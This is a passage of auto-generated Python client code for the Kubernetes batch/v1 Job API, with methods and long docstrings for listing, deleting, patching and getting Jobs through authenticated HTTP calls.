:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_job_with_http_info(self, namespace, **kwargs):
"""
delete collection of Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_job_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_job(self, name, namespace, **kwargs):
"""
delete a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_job(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param V1DeleteOptions body:
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def delete_namespaced_job_with_http_info(self, name, namespace, **kwargs):
"""
delete a Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_job_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param V1DeleteOptions body:
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:return: V1Status
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty', 'body', 'dry_run', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds']))
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents']))
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_resources(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_api_resources_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: V1APIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_job_for_all_namespaces(self, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_job_for_all_namespaces(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_job_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_job_for_all_namespaces_with_http_info(**kwargs)
return data
def list_job_for_all_namespaces_with_http_info(self, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_job_for_all_namespaces_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_job_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_job(self, namespace, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_job(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_job_with_http_info(namespace, **kwargs)
return data
def list_namespaced_job_with_http_info(self, namespace, **kwargs):
"""
list or watch objects of kind Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_namespaced_job_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1JobList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job(self, name, namespace, body, **kwargs):
"""
partially update the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
"""
partially update the specified Job
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_namespaced_job_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: name of the Job (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param object body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:return: V1Job
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
